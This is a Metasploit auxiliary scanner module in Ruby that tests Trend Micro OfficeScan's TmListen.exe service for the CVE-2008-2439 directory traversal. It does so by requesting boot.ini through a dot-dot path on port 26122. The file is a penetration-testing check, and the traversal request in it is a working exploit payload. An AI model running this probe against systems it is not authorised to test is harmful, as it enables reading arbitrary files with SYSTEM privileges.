root / modules / auxiliary / admin / officescan / tmlisten_traversal.rb @ master
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
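# Auxiliary scanner that checks whether a host's Trend Micro OfficeScan NT
# Listener (TmListen.exe) is affected by the UpdateAgent directory traversal
# tracked as CVE-2008-2439 (see 'References' below). The check is a single
# read-only GET for boot.ini; a positive result means the listener served a
# file from outside its update directory, i.e. the host has presumably not
# received the vendor critical patch linked in the references.
class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and overrides the default remote port with
  # 26122, the port this module expects the listener on.
  def initialize
    super(
      'Name'        => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
      'Version'     => '$Revision$',
      'Description' => %q{
          This module tests for directory traversal vulnerability in the UpdateAgent
        function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
        OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
        via dot dot sequences in an HTTP request.
      },
      'References'  =>
        [
          [ 'OSVDB', '48730' ],
          [ 'CVE', '2008-2439' ],
          [ 'BID', '31531' ],
          [ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
        ],
      'Author'      => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(26122),
      ], self.class)
  end

  # Probes one host and reports whether the traversal check succeeded.
  #
  # target_host - address of the host being scanned (supplied by the Scanner
  #               mixin, once per host in the configured range).
  #
  # Prints one status line per responding host; returns nothing of interest.
  def run_host(target_host)
    res = send_request_raw(
      {
        'uri'    => '/activeupdate/../../../../../../../../../../../boot.ini',
        'method' => 'GET',
      }, 20)

    # A nil response means nothing answered within the 20 second timeout.
    # Without this guard the status check below raised NoMethodError on nil
    # and aborted the scan of this host with a stack trace.
    return unless res

    http_fingerprint({ :response => res })

    return unless res.code >= 200

    # Match the section header that a real boot.ini contains rather than the
    # bare word "boot": an error page that echoes the requested path back
    # would otherwise be reported as vulnerable (false positive).
    vuln = (res.body.to_s =~ /\[boot loader\]/i) ? "vulnerable." : "not vulnerable."

    # Report the verdict even when the service sends no Server header;
    # previously such hosts produced no output at all, hiding positive results.
    server = res.headers['Server'] || 'an unidentified server'
    print_status("http://#{target_host}:#{rport} is running #{server} and is #{vuln}")
  end
end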